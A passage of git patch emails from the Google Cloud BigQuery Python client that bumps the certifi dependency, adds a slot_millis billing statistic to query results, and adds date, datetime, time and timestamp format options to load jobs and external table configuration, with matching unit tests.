self.assertEqual(ec.time_zone, self.TIME_ZONE) + def test_to_api_repr_source_format(self): ec = external_config.ExternalConfig("CSV") got = ec.to_api_repr() From 3ed0a0a3d9699f1f70a616cfd06d1958b69e1f03 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 10 Jul 2025 19:44:58 +0200 Subject: [PATCH 142/202] 
chore(deps): update dependency certifi to v2025.7.9 (#2232) Co-authored-by: Chalmer Lowe --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 5b342fe5c..447e92c81 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ attrs==25.3.0 -certifi==2025.6.15 +certifi==2025.7.9 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' From d44bf0231e6e96369e4e03667a3f96618fb664e2 Mon Sep 17 00:00:00 2001 From: Huan Chen <142538604+Genesis929@users.noreply.github.com> Date: Fri, 11 Jul 2025 10:10:58 -0700 Subject: [PATCH 143/202] feat: add total slot ms to RowIterator (#2233) * feat: add total slot ms to RowIterator * format fix --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/_job_helpers.py | 1 + google/cloud/bigquery/client.py | 4 ++++ google/cloud/bigquery/job/query.py | 1 + google/cloud/bigquery/query.py | 14 ++++++++++++++ google/cloud/bigquery/table.py | 7 +++++++ tests/unit/job/test_query.py | 2 ++ tests/unit/test_client.py | 2 ++ tests/unit/test_query.py | 16 ++++++++++++++++ 8 files changed, 47 insertions(+) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 888dc1e73..73d4f6e7b 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -560,6 +560,7 @@ def do_query(): num_dml_affected_rows=query_results.num_dml_affected_rows, query=query, total_bytes_processed=query_results.total_bytes_processed, + slot_millis=query_results.slot_millis, ) if job_retry is not None: diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 811e9ef03..804f77ea2 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -4144,6 +4144,7 @@ def _list_rows_from_query_results( num_dml_affected_rows: Optional[int] = None, query: 
Optional[str] = None, total_bytes_processed: Optional[int] = None, + slot_millis: Optional[int] = None, ) -> RowIterator: """List the rows of a completed query. See @@ -4195,6 +4196,8 @@ def _list_rows_from_query_results( The query text used. total_bytes_processed (Optional[int]): total bytes processed from job statistics, if present. + slot_millis (Optional[int]): + Number of slot ms the user is actually billed for. Returns: google.cloud.bigquery.table.RowIterator: @@ -4234,6 +4237,7 @@ def _list_rows_from_query_results( num_dml_affected_rows=num_dml_affected_rows, query=query, total_bytes_processed=total_bytes_processed, + slot_millis=slot_millis, ) return row_iterator diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 4d95f0e71..ec9379ea9 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1766,6 +1766,7 @@ def is_job_done(): num_dml_affected_rows=self._query_results.num_dml_affected_rows, query=self.query, total_bytes_processed=self.total_bytes_processed, + slot_millis=self.slot_millis, **list_rows_kwargs, ) rows._preserve_order = _contains_order_by(self.query) diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index 8745c09f5..4a006d621 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -1282,6 +1282,20 @@ def total_bytes_processed(self): if total_bytes_processed is not None: return int(total_bytes_processed) + @property + def slot_millis(self): + """Total number of slot ms the user is actually billed for. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query#body.QueryResponse.FIELDS.slot_millis + + Returns: + Optional[int]: Count generated on the server (None until set by the server). + """ + slot_millis = self._properties.get("totalSlotMs") + if slot_millis is not None: + return int(slot_millis) + @property def num_dml_affected_rows(self): """Total number of rows affected by a DML query. 
diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 861f806b4..dbdde36d1 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1812,6 +1812,7 @@ def __init__( num_dml_affected_rows: Optional[int] = None, query: Optional[str] = None, total_bytes_processed: Optional[int] = None, + slot_millis: Optional[int] = None, ): super(RowIterator, self).__init__( client, @@ -1841,6 +1842,7 @@ def __init__( self._num_dml_affected_rows = num_dml_affected_rows self._query = query self._total_bytes_processed = total_bytes_processed + self._slot_millis = slot_millis @property def _billing_project(self) -> Optional[str]: @@ -1898,6 +1900,11 @@ def total_bytes_processed(self) -> Optional[int]: """total bytes processed from job statistics, if present.""" return self._total_bytes_processed + @property + def slot_millis(self) -> Optional[int]: + """Number of slot ms the user is actually billed for.""" + return self._slot_millis + def _is_almost_completely_cached(self): """Check if all results are completely cached. 
diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 46b802aa3..7201adb55 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -888,6 +888,7 @@ def test_result_reloads_job_state_until_done(self): job_resource = self._make_resource(started=True, location="EU") job_resource_done = self._make_resource(started=True, ended=True, location="EU") job_resource_done["statistics"]["query"]["totalBytesProcessed"] = str(1234) + job_resource_done["statistics"]["query"]["totalSlotMs"] = str(5678) job_resource_done["configuration"]["query"]["destinationTable"] = { "projectId": "dest-project", "datasetId": "dest_dataset", @@ -969,6 +970,7 @@ def test_result_reloads_job_state_until_done(self): self.assertEqual(result.total_rows, 1) self.assertEqual(result.query, job.query) self.assertEqual(result.total_bytes_processed, 1234) + self.assertEqual(result.slot_millis, 5678) query_results_path = f"/projects/{self.PROJECT}/queries/{self.JOB_ID}" query_results_call = mock.call( diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 42bfc84b9..bb86ccc3c 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -5718,6 +5718,7 @@ def test_query_and_wait_defaults(self): "rows": [{"f": [{"v": "5552452"}]}], "queryId": "job_abcDEF_", "totalBytesProcessed": 1234, + "totalSlotMs": 5678, } creds = _make_credentials() http = object() @@ -5735,6 +5736,7 @@ def test_query_and_wait_defaults(self): self.assertIsNone(rows.location) self.assertEqual(rows.query, query) self.assertEqual(rows.total_bytes_processed, 1234) + self.assertEqual(rows.slot_millis, 5678) # Verify the request we send is to jobs.query. 
conn.api_request.assert_called_once() diff --git a/tests/unit/test_query.py b/tests/unit/test_query.py index 0d967bdb8..2b704d3c9 100644 --- a/tests/unit/test_query.py +++ b/tests/unit/test_query.py @@ -2000,6 +2000,22 @@ def test_total_bytes_processed_present_string(self): query = self._make_one(resource) self.assertEqual(query.total_bytes_processed, 123456) + def test_slot_millis_missing(self): + query = self._make_one(self._make_resource()) + self.assertIsNone(query.slot_millis) + + def test_slot_millis_present_integer(self): + resource = self._make_resource() + resource["totalSlotMs"] = 123456 + query = self._make_one(resource) + self.assertEqual(query.slot_millis, 123456) + + def test_slot_millis_present_string(self): + resource = self._make_resource() + resource["totalSlotMs"] = "123456" + query = self._make_one(resource) + self.assertEqual(query.slot_millis, 123456) + def test_num_dml_affected_rows_missing(self): query = self._make_one(self._make_resource()) self.assertIsNone(query.num_dml_affected_rows) From 7d3182802deccfceb0646b87fc8d12275d0a569b Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 11 Jul 2025 20:29:28 -0400 Subject: [PATCH 144/202] feat: adds date_format to load job and external config (#2231) * feat: adds date_format to load job and external config * adds date_format to new to/from_api_repr tests --- google/cloud/bigquery/external_config.py | 14 ++++++++++++++ google/cloud/bigquery/job/load.py | 20 ++++++++++++++++++++ tests/unit/job/test_load.py | 14 +++++++++----- tests/unit/job/test_load_config.py | 19 +++++++++++++++++++ tests/unit/test_external_config.py | 7 +++++-- 5 files changed, 67 insertions(+), 7 deletions(-) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index fcfcaca20..54b7bf396 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -848,6 +848,20 @@ def schema(self, value): prop = {"fields": [field.to_api_repr() for field 
in value]} self._properties["schema"] = prop + @property + def date_format(self) -> Optional[str]: + """Optional[str]: Format used to parse DATE values. Supports C-style and SQL-style values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.date_format + """ + result = self._properties.get("dateFormat") + return typing.cast(str, result) + + @date_format.setter + def date_format(self, value: Optional[str]): + self._properties["dateFormat"] = value + @property def time_zone(self) -> Optional[str]: """Optional[str]: Time zone used when parsing timestamp values that do not diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 5d49aef18..277478d81 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -548,6 +548,19 @@ def source_format(self): def source_format(self, value): self._set_sub_prop("sourceFormat", value) + @property + def date_format(self) -> Optional[str]: + """Optional[str]: Date format used for parsing DATE values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.date_format + """ + return self._get_sub_prop("dateFormat") + + @date_format.setter + def date_format(self, value: Optional[str]): + self._set_sub_prop("dateFormat", value) + @property def time_zone(self) -> Optional[str]: """Optional[str]: Default time zone that will apply when parsing timestamp @@ -903,6 +916,13 @@ def clustering_fields(self): """ return self.configuration.clustering_fields + @property + def date_format(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.date_format`. 
+ """ + return self.configuration.date_format + @property def time_zone(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 81d8e44b4..82baa03c7 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -37,14 +37,14 @@ def _setUpConstants(self): self.OUTPUT_BYTES = 23456 self.OUTPUT_ROWS = 345 self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" - + self.DATE_FORMAT = "%Y-%m-%d" self.TIME_ZONE = "UTC" def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) config = resource["configuration"]["load"] config["sourceUris"] = [self.SOURCE1] - + config["dateFormat"] = self.DATE_FORMAT config["timeZone"] = self.TIME_ZONE config["destinationTable"] = { "projectId": self.PROJECT, @@ -147,7 +147,6 @@ def _verifyResourceProperties(self, job, resource): ) else: self.assertIsNone(job.reference_file_schema_uri) - if "destinationEncryptionConfiguration" in config: self.assertIsNotNone(job.destination_encryption_configuration) self.assertEqual( @@ -156,6 +155,10 @@ def _verifyResourceProperties(self, job, resource): ) else: self.assertIsNone(job.destination_encryption_configuration) + if "dateFormat" in config: + self.assertEqual(job.date_format, config["dateFormat"]) + else: + self.assertIsNone(job.date_format) if "timeZone" in config: self.assertEqual(job.time_zone, config["timeZone"]) else: @@ -202,7 +205,7 @@ def test_ctor(self): self.assertIsNone(job.clustering_fields) self.assertIsNone(job.schema_update_options) self.assertIsNone(job.reference_file_schema_uri) - + self.assertIsNone(job.date_format) self.assertIsNone(job.time_zone) def test_ctor_w_config(self): @@ -599,6 +602,7 @@ def test_begin_w_alternate_client(self): ] }, "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], + "dateFormat": self.DATE_FORMAT, "timeZone": self.TIME_ZONE, } RESOURCE["configuration"]["load"] = LOAD_CONFIGURATION @@ -628,7 +632,7 @@ def 
test_begin_w_alternate_client(self): config.write_disposition = WriteDisposition.WRITE_TRUNCATE config.schema_update_options = [SchemaUpdateOption.ALLOW_FIELD_ADDITION] config.reference_file_schema_uri = "gs://path/to/reference" - + config.date_format = self.DATE_FORMAT config.time_zone = self.TIME_ZONE with mock.patch( diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 6424f7e68..5b7f8175b 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -828,6 +828,22 @@ def test_write_disposition_setter(self): config._properties["load"]["writeDisposition"], write_disposition ) + def test_date_format_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.date_format) + + def test_date_format_hit(self): + date_format = "%Y-%m-%d" + config = self._get_target_class()() + config._properties["load"]["dateFormat"] = date_format + self.assertEqual(config.date_format, date_format) + + def test_date_format_setter(self): + date_format = "YYYY/MM/DD" + config = self._get_target_class()() + config.date_format = date_format + self.assertEqual(config._properties["load"]["dateFormat"], date_format) + def test_time_zone_missing(self): config = self._get_target_class()() self.assertIsNone(config.time_zone) @@ -942,6 +958,7 @@ def test_column_name_character_map_none(self): }, "useAvroLogicalTypes": True, "writeDisposition": "WRITE_TRUNCATE", + "dateFormat": "%Y-%m-%d", "timeZone": "America/New_York", "parquetOptions": {"enableListInference": True}, "columnNameCharacterMap": "V2", @@ -983,6 +1000,7 @@ def test_from_api_repr(self): ) self.assertTrue(config.use_avro_logical_types) self.assertEqual(config.write_disposition, WriteDisposition.WRITE_TRUNCATE) + self.assertEqual(config.date_format, "%Y-%m-%d") self.assertEqual(config.time_zone, "America/New_York") self.assertTrue(config.parquet_options.enable_list_inference) self.assertEqual(config.column_name_character_map, 
ColumnNameCharacterMap.V2) @@ -1017,6 +1035,7 @@ def test_to_api_repr(self): ) config.use_avro_logical_types = True config.write_disposition = WriteDisposition.WRITE_TRUNCATE + config.date_format = "%Y-%m-%d" config.time_zone = "America/New_York" parquet_options = ParquetOptions() parquet_options.enable_list_inference = True diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index a89b7a1fb..0f5d09504 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -25,7 +25,7 @@ class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] - + DATE_FORMAT = "MM/DD/YYYY" TIME_ZONE = "America/Los_Angeles" BASE_RESOURCE = { @@ -35,6 +35,7 @@ class TestExternalConfig(unittest.TestCase): "autodetect": True, "ignoreUnknownValues": False, "compression": "compression", + "dateFormat": DATE_FORMAT, "timeZone": TIME_ZONE, } @@ -82,6 +83,7 @@ def test_to_api_repr_base(self): ec.connection_id = "path/to/connection" ec.schema = [schema.SchemaField("full_name", "STRING", mode="REQUIRED")] + ec.date_format = self.DATE_FORMAT ec.time_zone = self.TIME_ZONE exp_schema = { "fields": [{"name": "full_name", "type": "STRING", "mode": "REQUIRED"}] @@ -96,6 +98,7 @@ def test_to_api_repr_base(self): "compression": "compression", "connectionId": "path/to/connection", "schema": exp_schema, + "dateFormat": self.DATE_FORMAT, "timeZone": self.TIME_ZONE, } self.assertEqual(got_resource, exp_resource) @@ -132,7 +135,7 @@ def _verify_base(self, ec): self.assertEqual(ec.ignore_unknown_values, False) self.assertEqual(ec.max_bad_records, 17) self.assertEqual(ec.source_uris, self.SOURCE_URIS) - + self.assertEqual(ec.date_format, self.DATE_FORMAT) self.assertEqual(ec.time_zone, self.TIME_ZONE) def test_to_api_repr_source_format(self): From 371ad292df537278767dba71d81822ed57dd8e7d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 14 Jul 2025 12:14:58 -0400 Subject: [PATCH 145/202] feat: adds time_format and 
timestamp_format and associated tests (#2238) --- google/cloud/bigquery/external_config.py | 28 +++++++++++++++++ google/cloud/bigquery/job/load.py | 40 ++++++++++++++++++++++++ tests/unit/job/test_load.py | 20 ++++++++++++ tests/unit/job/test_load_config.py | 34 ++++++++++++++++++++ tests/unit/test_external_config.py | 11 +++++++ 5 files changed, 133 insertions(+) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 54b7bf396..370f62c0a 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -879,6 +879,34 @@ def time_zone(self) -> Optional[str]: def time_zone(self, value: Optional[str]): self._properties["timeZone"] = value + @property + def time_format(self) -> Optional[str]: + """Optional[str]: Format used to parse TIME values. Supports C-style and SQL-style values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.time_format + """ + result = self._properties.get("timeFormat") + return typing.cast(str, result) + + @time_format.setter + def time_format(self, value: Optional[str]): + self._properties["timeFormat"] = value + + @property + def timestamp_format(self) -> Optional[str]: + """Optional[str]: Format used to parse TIMESTAMP values. Supports C-style and SQL-style values. 
+ + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.timestamp_format + """ + result = self._properties.get("timestampFormat") + return typing.cast(str, result) + + @timestamp_format.setter + def timestamp_format(self, value: Optional[str]): + self._properties["timestampFormat"] = value + @property def connection_id(self): """Optional[str]: [Experimental] ID of a BigQuery Connection API diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 277478d81..2e5a9a9bb 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -575,6 +575,32 @@ def time_zone(self) -> Optional[str]: def time_zone(self, value: Optional[str]): self._set_sub_prop("timeZone", value) + @property + def time_format(self) -> Optional[str]: + """Optional[str]: Date format used for parsing TIME values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.time_format + """ + return self._get_sub_prop("timeFormat") + + @time_format.setter + def time_format(self, value: Optional[str]): + self._set_sub_prop("timeFormat", value) + + @property + def timestamp_format(self) -> Optional[str]: + """Optional[str]: Date format used for parsing TIMESTAMP values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.timestamp_format + """ + return self._get_sub_prop("timestampFormat") + + @timestamp_format.setter + def timestamp_format(self, value: Optional[str]): + self._set_sub_prop("timestampFormat", value) + @property def time_partitioning(self): """Optional[google.cloud.bigquery.table.TimePartitioning]: Specifies time-based @@ -930,6 +956,20 @@ def time_zone(self): """ return self.configuration.time_zone + @property + def time_format(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.time_format`. 
+ """ + return self.configuration.time_format + + @property + def timestamp_format(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.timestamp_format`. + """ + return self.configuration.timestamp_format + @property def schema_update_options(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 82baa03c7..77adf0cc8 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -39,6 +39,8 @@ def _setUpConstants(self): self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" self.DATE_FORMAT = "%Y-%m-%d" self.TIME_ZONE = "UTC" + self.TIME_FORMAT = "%H:%M:%S" + self.TIMESTAMP_FORMAT = "YYYY-MM-DD HH:MM:SS.SSSSSSZ" def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) @@ -46,6 +48,9 @@ def _make_resource(self, started=False, ended=False): config["sourceUris"] = [self.SOURCE1] config["dateFormat"] = self.DATE_FORMAT config["timeZone"] = self.TIME_ZONE + config["timeFormat"] = self.TIME_FORMAT + config["timestampFormat"] = self.TIMESTAMP_FORMAT + config["destinationTable"] = { "projectId": self.PROJECT, "datasetId": self.DS_ID, @@ -163,6 +168,14 @@ def _verifyResourceProperties(self, job, resource): self.assertEqual(job.time_zone, config["timeZone"]) else: self.assertIsNone(job.time_zone) + if "timeFormat" in config: + self.assertEqual(job.time_format, config["timeFormat"]) + else: + self.assertIsNone(job.time_format) + if "timestampFormat" in config: + self.assertEqual(job.timestamp_format, config["timestampFormat"]) + else: + self.assertIsNone(job.timestamp_format) def test_ctor(self): client = _make_client(project=self.PROJECT) @@ -207,6 +220,8 @@ def test_ctor(self): self.assertIsNone(job.reference_file_schema_uri) self.assertIsNone(job.date_format) self.assertIsNone(job.time_zone) + self.assertIsNone(job.time_format) + self.assertIsNone(job.timestamp_format) def test_ctor_w_config(self): from google.cloud.bigquery.schema import 
SchemaField @@ -604,7 +619,10 @@ def test_begin_w_alternate_client(self): "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], "dateFormat": self.DATE_FORMAT, "timeZone": self.TIME_ZONE, + "timeFormat": self.TIME_FORMAT, + "timestampFormat": self.TIMESTAMP_FORMAT, } + RESOURCE["configuration"]["load"] = LOAD_CONFIGURATION conn1 = make_connection() client1 = _make_client(project=self.PROJECT, connection=conn1) @@ -634,6 +652,8 @@ def test_begin_w_alternate_client(self): config.reference_file_schema_uri = "gs://path/to/reference" config.date_format = self.DATE_FORMAT config.time_zone = self.TIME_ZONE + config.time_format = self.TIME_FORMAT + config.timestamp_format = self.TIMESTAMP_FORMAT with mock.patch( "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 5b7f8175b..b733bdda0 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -860,6 +860,40 @@ def test_time_zone_setter(self): config.time_zone = time_zone self.assertEqual(config._properties["load"]["timeZone"], time_zone) + def test_time_format_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.time_format) + + def test_time_format_hit(self): + time_format = "%H:%M:%S" + config = self._get_target_class()() + config._properties["load"]["timeFormat"] = time_format + self.assertEqual(config.time_format, time_format) + + def test_time_format_setter(self): + time_format = "HH24:MI:SS" + config = self._get_target_class()() + config.time_format = time_format + self.assertEqual(config._properties["load"]["timeFormat"], time_format) + + def test_timestamp_format_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.timestamp_format) + + def test_timestamp_format_hit(self): + timestamp_format = "%Y-%m-%dT%H:%M:%S.%fZ" + config = self._get_target_class()() + config._properties["load"]["timestampFormat"] = 
timestamp_format + self.assertEqual(config.timestamp_format, timestamp_format) + + def test_timestamp_format_setter(self): + timestamp_format = "YYYY/MM/DD HH24:MI:SS.FF6 TZR" + config = self._get_target_class()() + config.timestamp_format = timestamp_format + self.assertEqual( + config._properties["load"]["timestampFormat"], timestamp_format + ) + def test_parquet_options_missing(self): config = self._get_target_class()() self.assertIsNone(config.parquet_options) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 0f5d09504..8b41cd8e3 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -27,6 +27,8 @@ class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] DATE_FORMAT = "MM/DD/YYYY" TIME_ZONE = "America/Los_Angeles" + TIME_FORMAT = "HH24:MI:SS" + TIMESTAMP_FORMAT = "MM/DD/YYYY HH24:MI:SS.FF6 TZR" BASE_RESOURCE = { "sourceFormat": "", @@ -37,6 +39,8 @@ class TestExternalConfig(unittest.TestCase): "compression": "compression", "dateFormat": DATE_FORMAT, "timeZone": TIME_ZONE, + "timeFormat": TIME_FORMAT, + "timestampFormat": TIMESTAMP_FORMAT, } def test_from_api_repr_base(self): @@ -85,6 +89,9 @@ def test_to_api_repr_base(self): ec.date_format = self.DATE_FORMAT ec.time_zone = self.TIME_ZONE + ec.time_format = self.TIME_FORMAT + ec.timestamp_format = self.TIMESTAMP_FORMAT + exp_schema = { "fields": [{"name": "full_name", "type": "STRING", "mode": "REQUIRED"}] } @@ -100,6 +107,8 @@ def test_to_api_repr_base(self): "schema": exp_schema, "dateFormat": self.DATE_FORMAT, "timeZone": self.TIME_ZONE, + "timeFormat": self.TIME_FORMAT, + "timestampFormat": self.TIMESTAMP_FORMAT, } self.assertEqual(got_resource, exp_resource) @@ -137,6 +146,8 @@ def _verify_base(self, ec): self.assertEqual(ec.source_uris, self.SOURCE_URIS) self.assertEqual(ec.date_format, self.DATE_FORMAT) self.assertEqual(ec.time_zone, self.TIME_ZONE) + self.assertEqual(ec.time_format, self.TIME_FORMAT) 
+ self.assertEqual(ec.timestamp_format, self.TIMESTAMP_FORMAT) def test_to_api_repr_source_format(self): ec = external_config.ExternalConfig("CSV") From 54d3dc66244d50a031e3c80d43d372d2743ecbc3 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 15 Jul 2025 05:22:44 -0400 Subject: [PATCH 146/202] feat: adds datetime_format as an option (#2236) * feat: adds datetime_format as an option * updates docstrings --- google/cloud/bigquery/external_config.py | 15 +++++++++++++++ google/cloud/bigquery/job/load.py | 20 ++++++++++++++++++++ tests/unit/job/test_load.py | 9 +++++++++ tests/unit/job/test_load_config.py | 16 ++++++++++++++++ tests/unit/test_external_config.py | 5 +++++ 5 files changed, 65 insertions(+) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 370f62c0a..82c6a9e75 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -862,6 +862,21 @@ def date_format(self) -> Optional[str]: def date_format(self, value: Optional[str]): self._properties["dateFormat"] = value + @property + def datetime_format(self) -> Optional[str]: + """Optional[str]: Format used to parse DATETIME values. Supports C-style + and SQL-style values. 
+ + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.datetime_format + """ + result = self._properties.get("datetimeFormat") + return typing.cast(str, result) + + @datetime_format.setter + def datetime_format(self, value: Optional[str]): + self._properties["datetimeFormat"] = value + @property def time_zone(self) -> Optional[str]: """Optional[str]: Time zone used when parsing timestamp values that do not diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 2e5a9a9bb..3be914f43 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -561,6 +561,19 @@ def date_format(self) -> Optional[str]: def date_format(self, value: Optional[str]): self._set_sub_prop("dateFormat", value) + @property + def datetime_format(self) -> Optional[str]: + """Optional[str]: Date format used for parsing DATETIME values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.datetime_format + """ + return self._get_sub_prop("datetimeFormat") + + @datetime_format.setter + def datetime_format(self, value: Optional[str]): + self._set_sub_prop("datetimeFormat", value) + @property def time_zone(self) -> Optional[str]: """Optional[str]: Default time zone that will apply when parsing timestamp @@ -949,6 +962,13 @@ def date_format(self): """ return self.configuration.date_format + @property + def datetime_format(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.datetime_format`. 
+ """ + return self.configuration.datetime_format + @property def time_zone(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 77adf0cc8..7afe9cba6 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -38,6 +38,7 @@ def _setUpConstants(self): self.OUTPUT_ROWS = 345 self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" self.DATE_FORMAT = "%Y-%m-%d" + self.DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%S" self.TIME_ZONE = "UTC" self.TIME_FORMAT = "%H:%M:%S" self.TIMESTAMP_FORMAT = "YYYY-MM-DD HH:MM:SS.SSSSSSZ" @@ -47,6 +48,7 @@ def _make_resource(self, started=False, ended=False): config = resource["configuration"]["load"] config["sourceUris"] = [self.SOURCE1] config["dateFormat"] = self.DATE_FORMAT + config["datetimeFormat"] = self.DATETIME_FORMAT config["timeZone"] = self.TIME_ZONE config["timeFormat"] = self.TIME_FORMAT config["timestampFormat"] = self.TIMESTAMP_FORMAT @@ -164,6 +166,10 @@ def _verifyResourceProperties(self, job, resource): self.assertEqual(job.date_format, config["dateFormat"]) else: self.assertIsNone(job.date_format) + if "datetimeFormat" in config: + self.assertEqual(job.datetime_format, config["datetimeFormat"]) + else: + self.assertIsNone(job.datetime_format) if "timeZone" in config: self.assertEqual(job.time_zone, config["timeZone"]) else: @@ -219,6 +225,7 @@ def test_ctor(self): self.assertIsNone(job.schema_update_options) self.assertIsNone(job.reference_file_schema_uri) self.assertIsNone(job.date_format) + self.assertIsNone(job.datetime_format) self.assertIsNone(job.time_zone) self.assertIsNone(job.time_format) self.assertIsNone(job.timestamp_format) @@ -618,6 +625,7 @@ def test_begin_w_alternate_client(self): }, "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], "dateFormat": self.DATE_FORMAT, + "datetimeFormat": self.DATETIME_FORMAT, "timeZone": self.TIME_ZONE, "timeFormat": self.TIME_FORMAT, "timestampFormat": self.TIMESTAMP_FORMAT, @@ -651,6 +659,7 @@ def 
test_begin_w_alternate_client(self): config.schema_update_options = [SchemaUpdateOption.ALLOW_FIELD_ADDITION] config.reference_file_schema_uri = "gs://path/to/reference" config.date_format = self.DATE_FORMAT + config.datetime_format = self.DATETIME_FORMAT config.time_zone = self.TIME_ZONE config.time_format = self.TIME_FORMAT config.timestamp_format = self.TIMESTAMP_FORMAT diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index b733bdda0..dbb062486 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -844,6 +844,22 @@ def test_date_format_setter(self): config.date_format = date_format self.assertEqual(config._properties["load"]["dateFormat"], date_format) + def test_datetime_format_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.datetime_format) + + def test_datetime_format_hit(self): + datetime_format = "%Y-%m-%dT%H:%M:%S" + config = self._get_target_class()() + config._properties["load"]["datetimeFormat"] = datetime_format + self.assertEqual(config.datetime_format, datetime_format) + + def test_datetime_format_setter(self): + datetime_format = "YYYY/MM/DD HH24:MI:SS" + config = self._get_target_class()() + config.datetime_format = datetime_format + self.assertEqual(config._properties["load"]["datetimeFormat"], datetime_format) + def test_time_zone_missing(self): config = self._get_target_class()() self.assertIsNone(config.time_zone) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 8b41cd8e3..3a441d1f5 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py 